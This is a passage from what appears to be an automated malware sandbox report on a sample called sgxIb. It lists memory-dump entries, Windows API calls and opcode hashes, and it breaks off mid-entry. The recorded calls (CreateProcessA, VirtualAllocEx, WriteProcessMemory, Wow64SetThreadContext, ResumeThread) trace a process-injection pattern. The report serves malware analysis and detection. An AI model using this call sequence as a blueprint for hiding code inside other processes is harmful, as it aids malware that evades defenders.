                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: edb8c010491192098a7e2bd3ba2089573b1cb9376a330de63287a15aaf3e07d4
                                        • Instruction ID: 9584c9f8a56ceb31361c77991f86b299008bf78a6f857182faad37795efe04b8
                                        • Opcode Fuzzy Hash: edb8c010491192098a7e2bd3ba2089573b1cb9376a330de63287a15aaf3e07d4
                                        • Instruction Fuzzy Hash: 76A17B71D00219DFDB50CFA9C841BEEFBB2BF45314F1485A9E848A7290DBB49A85CF91

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D1826
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: ce675b939a534b310547ef91e36349b9c32c2f2f268e1400374bd80dcfa8be31
                                        • Instruction ID: 3c92d8528a3d1bcde615a931a882ad04af11c7c7c666f2f0b95eec15b684dad8
                                        • Opcode Fuzzy Hash: ce675b939a534b310547ef91e36349b9c32c2f2f268e1400374bd80dcfa8be31
                                        • Instruction Fuzzy Hash: D4918B71D00219DFDB50CFA9C840BEDFBB2BF49314F1485A9E848A7290DBB49A85CF91

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B3BE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 39893f70aba54c5fbb62e3e381a57cdaaff5de7189db1081bbe1c568546bdd21
                                        • Instruction ID: cd9249bd2e98123329766bfd3f233b85ed1b0e65fe10d5057b125f5c6ce361d5
                                        • Opcode Fuzzy Hash: 39893f70aba54c5fbb62e3e381a57cdaaff5de7189db1081bbe1c568546bdd21
                                        • Instruction Fuzzy Hash: A1814470A00B058FD724DF69D455B9ABBF1FF88304F008A6DD48ADBA90DB74E945CB91

                                        Control-flow Graph

                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B05F31
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 1f5571552d25f585a41d2b4f8fadb087cb9d4f08c581ff24e61fd9cffc25a7fb
                                        • Instruction ID: 16a58e2128d5760cd6c0703a9599a1fe2be42577b2834cc9bfe4fdcdb53072ea
                                        • Opcode Fuzzy Hash: 1f5571552d25f585a41d2b4f8fadb087cb9d4f08c581ff24e61fd9cffc25a7fb
                                        • Instruction Fuzzy Hash: B54102B0C00619CFDB24CFA9C944BDEBBF5BF49304F2484AAD008AB295DB756986CF50

                                        Control-flow Graph

                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B05F31
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 772951b633bde908ee1ae4040c80e5c586a4cf7a81104dc8ea37a538a9cd862a
                                        • Instruction ID: 9e9ed961a26d4ef1f06982a22467660ae6e1492183ef187e51a855830fdc0599
                                        • Opcode Fuzzy Hash: 772951b633bde908ee1ae4040c80e5c586a4cf7a81104dc8ea37a538a9cd862a
                                        • Instruction Fuzzy Hash: 8641DFB0C00619CBDB24DFA9C984BDEBBF5BF48304F2084AAD408AB695DB756945CF90

                                        Control-flow Graph

                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: c14309cafe72e33791d3c7a7ec3c6679fd503b7d23b33b49e3f0897d2597e78f
                                        • Instruction ID: e20394b84ab50151d0f7c11720a148b832bcde6518d5810c190f712269ff3968
                                        • Opcode Fuzzy Hash: c14309cafe72e33791d3c7a7ec3c6679fd503b7d23b33b49e3f0897d2597e78f
                                        • Instruction Fuzzy Hash: 70219A72D052298BDB60DFA5D8047EEBBF4AF48348F14805AD802AB642CB395944CBE0

                                        Control-flow Graph

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D13F8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 045ae6b5faefc15f9c6f6b93f18bb0ccd2968b97de4a5aeb329e0520a8cbdeff
                                        • Instruction ID: 8b07d01b3db3c935ab5e5dff7e60ac2da6ec4fa6d90d2cd1dfadc0f8290bb0be
                                        • Opcode Fuzzy Hash: 045ae6b5faefc15f9c6f6b93f18bb0ccd2968b97de4a5aeb329e0520a8cbdeff
                                        • Instruction Fuzzy Hash: E32135B1D002599FCB10CFAAC881BDEBBF1FB48314F10842AE959A7241D7789955CBA0

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 633ef0b66054cb905f43c8199af235e92288cd074f04314b8f69a7683e327637
                                        • Instruction ID: aed2b43181194f223a8a58dc4e8336fd47be7b2aa83642ea3019ada43832561f
                                        • Opcode Fuzzy Hash: 633ef0b66054cb905f43c8199af235e92288cd074f04314b8f69a7683e327637
                                        • Instruction Fuzzy Hash: 66210232E063508FDB219B2AD8007AFBBF49F85254F19846BD846E7A81CB759904CBE1

                                        Control-flow Graph

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D13F8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2c9e9109d70e9296cfee65a98bb617bbabca64d2d0d7290b697b60f8cbf1a1fa
                                        • Instruction ID: 057a1e194484695daddf4e4641a12218b2e6d3fc2a96b14675ad660f6420ae5d
                                        • Opcode Fuzzy Hash: 2c9e9109d70e9296cfee65a98bb617bbabca64d2d0d7290b697b60f8cbf1a1fa
                                        • Instruction Fuzzy Hash: 5C2113B19003599FCB10CFAAC885BDEBBF5FB48314F10842AE959A7250D778A954CBA4

                                        Control-flow Graph

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D14D8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 7b800046f1225622988e55864c6cc4101c12182193b4900503086800f3ed4b6c
                                        • Instruction ID: f0064b2c713bf3500adce3728b8fec1a0b0f4aac9ed9d0db736dd532e189610d
                                        • Opcode Fuzzy Hash: 7b800046f1225622988e55864c6cc4101c12182193b4900503086800f3ed4b6c
                                        • Instruction Fuzzy Hash: 542136B1D002499FCB10DFAAC881ADEFBF5FF48314F108429E959A7250D7789545CBA1
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D09DE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 8a4cef1a76aa3714ab17dce17da21632117e3d18547c31be250082c5ad26ebb2
                                        • Instruction ID: 8618cad481dd6664a8f3f54b08ffe9276bfceab84cd5b24de15447d292c78c6b
                                        • Opcode Fuzzy Hash: 8a4cef1a76aa3714ab17dce17da21632117e3d18547c31be250082c5ad26ebb2
                                        • Instruction Fuzzy Hash: D12125B1D003098FDB10DFAAC4857EEBBF4AB88324F14842AD459A7241DB789985CBA5
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D14D8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ef229f37139bbec50bc8d728b105aaef84c104a37e37eb652ee11d314770d2b9
                                        • Instruction ID: 2083b3867ce5aab76ffd5018fdd7b904dc33b588c110af399f139f8adc923445
                                        • Opcode Fuzzy Hash: ef229f37139bbec50bc8d728b105aaef84c104a37e37eb652ee11d314770d2b9
                                        • Instruction Fuzzy Hash: 192139B1D003599FCB10DFAAC880ADEFBF5FF48314F108429E559A7250C778A544CBA4
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D09DE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 36af678df97474b5fdb6177badc8911bce11159937856a1d0fb0ecd23bf716f4
                                        • Instruction ID: c3f0928d5bbe8e4ed4fbd50d32bdd1137e706acfcfe7b0b5c37259d0579df826
                                        • Opcode Fuzzy Hash: 36af678df97474b5fdb6177badc8911bce11159937856a1d0fb0ecd23bf716f4
                                        • Instruction Fuzzy Hash: 6F2107B1D003098FDB50DFAAC4857EEBBF4AB88324F148429D459A7241DB78A985CFA5
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0DACF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 91ba88b62a6e49315df9e61e6e0cda3ff68d529758e019b4c7807c7c92a78a63
                                        • Instruction ID: e46cfe50332960d5ba1ba409e1d08c9c7c31f07ecc33ee0d71de2acb44744a11
                                        • Opcode Fuzzy Hash: 91ba88b62a6e49315df9e61e6e0cda3ff68d529758e019b4c7807c7c92a78a63
                                        • Instruction Fuzzy Hash: 0E21E4B59002489FDB10CF9AD584ADEFFF4EB48310F14841AE914A3350D374A940CFA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D1316
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 03191c5cf0e315363fa66a1e4529196fc1c8ebbe8ba2aaa89eb7f88fb78d15ca
                                        • Instruction ID: 0bfa40cb7fc9a96b7660fdb7729499f728bbe37e5957b9988893401e204e82e1
                                        • Opcode Fuzzy Hash: 03191c5cf0e315363fa66a1e4529196fc1c8ebbe8ba2aaa89eb7f88fb78d15ca
                                        • Instruction Fuzzy Hash: B81137719002499FCB10DFAAC845BDEFFF5EF88324F108429E559A7250C7759945CFA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D1316
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 01af7966a9ad65c00e0206eaa66642cbcbde6a5a0f47aa2f3c09ee0c92f0fff9
                                        • Instruction ID: e2d14ed7ade029a0432e0034af3d7061d9b7585778c64a3e0df3ee9b31c46f51
                                        • Opcode Fuzzy Hash: 01af7966a9ad65c00e0206eaa66642cbcbde6a5a0f47aa2f3c09ee0c92f0fff9
                                        • Instruction Fuzzy Hash: 801137719002499FCB10DFAAC844BDEFFF5EF88324F108419E559A7250C775A944CFA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: e8336868ed87203dd108c761ed70316f7b11256efc0e059b473411ef91d59aad
                                        • Instruction ID: 80780187dcf2a5499cba04be66ddc65b8e60fb018dafc9efea68f090af311ef3
                                        • Opcode Fuzzy Hash: e8336868ed87203dd108c761ed70316f7b11256efc0e059b473411ef91d59aad
                                        • Instruction Fuzzy Hash: C6116AB1D002488FDB20DFAAC4457DFFBF4EB88324F208429D459A7240C738A945CFA4
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 84914feb3920d09688e8c006facf1851dd4bc5316bb6d40579b1440ee717f839
                                        • Instruction ID: d7c1df8a9ff240d42a079bc991cc31833d7e8e7d435d6b11951381f3fa823e98
                                        • Opcode Fuzzy Hash: 84914feb3920d09688e8c006facf1851dd4bc5316bb6d40579b1440ee717f839
                                        • Instruction Fuzzy Hash: BB1122B58003489FCB10DF9AC884BDEFBF8EB48324F208419E419A7600C375AA84CFE0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: fc64ebfde10d740772554da8cf5c6237939d470c638fea6420401c847210864c
                                        • Instruction ID: af3812b8f61d3396e932c29637a533750f42d3a38262f5f370fc698fe82c5e18
                                        • Opcode Fuzzy Hash: fc64ebfde10d740772554da8cf5c6237939d470c638fea6420401c847210864c
                                        • Instruction Fuzzy Hash: 3F1136B1D003498FDB20DFAAC4457EEFBF5EB88324F208429D459A7250CB79A944CFA5
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B3BE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 767c47a9d6ec5103dda248aebb7cd0a680ca52017b7da93ce953d8a22138760b
                                        • Instruction ID: f89029439b8e511b359d411d70e5f92388395eff39b990002db1dff30c8f51af
                                        • Opcode Fuzzy Hash: 767c47a9d6ec5103dda248aebb7cd0a680ca52017b7da93ce953d8a22138760b
                                        • Instruction Fuzzy Hash: 5A111DB6D003498FCB10CF9AD444ADEFBF4EF88324F20846AD829A7650C379A545CFA5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 82f1da9519ecfdab7dc6dadc6196054690192b6a9fd73c697e7aeeb4e9e863d8
                                        • Instruction ID: 985d5ca148c7f94010e51167c57d18872db344e8a2d4bbede063701c2f2e47c6
                                        • Opcode Fuzzy Hash: 82f1da9519ecfdab7dc6dadc6196054690192b6a9fd73c697e7aeeb4e9e863d8
                                        • Instruction Fuzzy Hash: 8B1122B58003499FCB10DF8AD888BDEFBF8EB48324F10841AE519A7600C375A984CFE0
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6dcbf7e2f617dbe0f21c44888504c7a367e02c53d0358a131398d123a8c88ce
                                        • Instruction ID: 81d38c3f18896c808748cd0f65849dd7ce79ca2ae874fb1728d3e92541ca035e
                                        • Opcode Fuzzy Hash: a6dcbf7e2f617dbe0f21c44888504c7a367e02c53d0358a131398d123a8c88ce
                                        • Instruction Fuzzy Hash: 74212871500308DFDB05DF24D9C4B26BF66FBA4314F20C169DB098B256C33AE856C6A2
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900066194.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_90d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f8bbd3dcd5483465b1576fd71d509527e041848ed3490e3bb5ab18fd93f0e90
                                        • Instruction ID: 2f4e5f8aabfe0e179bdef820aca091c914aa3523fa8a972e55983fd34740c202
                                        • Opcode Fuzzy Hash: 2f8bbd3dcd5483465b1576fd71d509527e041848ed3490e3bb5ab18fd93f0e90
                                        • Instruction Fuzzy Hash: C121F271604200DFDB14DF54D984B26BBB9EB84314F20C969D84E4B296C33AD847CA61
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction ID: 3d9f1fd82f135ad6a210ebbcd9074f035414b35025027bde1b7d40cefd290d3d
                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction Fuzzy Hash: CC11E472404344CFCB01CF10D5C4B26BF72FBA4314F24C2A9DA094B656C33AD456CBA1
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900066194.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_90d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: a67ce7e774ca72e6cbf9bf8d38ebb9c5baeb5c4ce108db3b91c597253b5d2226
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: B6118B75504280DFDB15CF54D5C4B16BBB2FB84314F24C6AAD8494B696C33AD84ACBA2
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 697c830f6dca68c2ad48996e31a6bc968c5db25e11a3896d37b890cd46b3b284
                                        • Instruction ID: b75fa6550b8b56350bb31a40983991f48ed06785089873d6d6b7e661c105c272
                                        • Opcode Fuzzy Hash: 697c830f6dca68c2ad48996e31a6bc968c5db25e11a3896d37b890cd46b3b284
                                        • Instruction Fuzzy Hash: D201A7711093489AE7106A35CDC4777FF99FF41324F28C569EF098E196D2799840C671
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c053176b7c9288a964957bf457b2c9b687ca1389542e8392c81508537fe4ba70
                                        • Instruction ID: c7367ee92ecc027774da2d3e7c5380171785d13c936b7d50005c4597e8f973ab
                                        • Opcode Fuzzy Hash: c053176b7c9288a964957bf457b2c9b687ca1389542e8392c81508537fe4ba70
                                        • Instruction Fuzzy Hash: EFF06272408344AAE7109A26C9C4B66FFA9EF91734F28C55AEE085E296C2799844CA71

                                        Execution Graph

                                        Execution Coverage:14.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:17
                                        Total number of Limit Nodes:4

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 63cd287647a087a48b4fa74859ded6ef90a92933fe2cf5549929797f8c352583
                                        • Instruction ID: 46b3f1ca4c8d24d81504996c9201ad723ea5e86a81de7271ffb63f5f4a5bd3fb
                                        • Opcode Fuzzy Hash: 63cd287647a087a48b4fa74859ded6ef90a92933fe2cf5549929797f8c352583
                                        • Instruction Fuzzy Hash: CE320D31E1071ACFCB54EF79D89459DB7B6FF89300F10C6A9D409AB264EB30A985CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e46b1ad34af453dd6243d27d46564a2b06487575262bd442db4ab4091b684a16
                                        • Instruction ID: 4845eecbc6ac2bec36db6e00d7a5342e6895a6474988ca5974f8c29546784081
                                        • Opcode Fuzzy Hash: e46b1ad34af453dd6243d27d46564a2b06487575262bd442db4ab4091b684a16
                                        • Instruction Fuzzy Hash: 0423EA31D10B198ECB15EB68C8905ADF7B1FF99300F15D79AE458BB221EB70AAC5CB41
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11c653aa963508afa4a38e005a3f3c9c1eaec671d5ae431cf4706cf44329750a
                                        • Instruction ID: c5a3705d2affb91e2c95b21a6c21d03ebf1ef636f7aec9be3156f67ee2b80798
                                        • Opcode Fuzzy Hash: 11c653aa963508afa4a38e005a3f3c9c1eaec671d5ae431cf4706cf44329750a
                                        • Instruction Fuzzy Hash: E823E931D10B198ECB15EB68C8905ADF7B1FF99300F15D79AE458BB221EB70AAC5CB41

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: 76d8b1ff3c82f0a6ed00949840d73bafe3a921b6a1b10a298ee60a16348357b7
                                        • Instruction ID: 9949f73b68d4ffae17a31c91a8a65c7f6201b619682bb66f1889be47cebeeb0e
                                        • Opcode Fuzzy Hash: 76d8b1ff3c82f0a6ed00949840d73bafe3a921b6a1b10a298ee60a16348357b7
                                        • Instruction Fuzzy Hash: 64E16B30E0130ACFDB69DF69D5946AEB7B2FB84340F108529D419AF354DB35DC868B81

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: c0275a9f343bc58315396f4e6bd9198bf2a43f19543b654446d2b2272e88adc5
                                        • Instruction ID: d58490889236255b99ca247dca6e5aa75ab428ea0a7935027b37aa697ffca3f8
                                        • Opcode Fuzzy Hash: c0275a9f343bc58315396f4e6bd9198bf2a43f19543b654446d2b2272e88adc5
                                        • Instruction Fuzzy Hash: 0F914E30F0020A9FDB54DB69D9607AEB3F6EBC9244F108569C409EB394EB74DD868F91

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457
                                        • Opcode ID: 9c381caccf10efe06633e144a97acefd1290683ec895df0044e0c1534e0e4c4b
                                        • Instruction ID: 077f133a44631220cb2a3e0003e7fbf2b197bb7830f1b1c72c71488ffcaa48cf
                                        • Opcode Fuzzy Hash: 9c381caccf10efe06633e144a97acefd1290683ec895df0044e0c1534e0e4c4b
                                        • Instruction Fuzzy Hash: 21624130A002068FCB55EF69D590A5DBBF2FF84354F108A69D4099F369DB75ED8ACB80

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
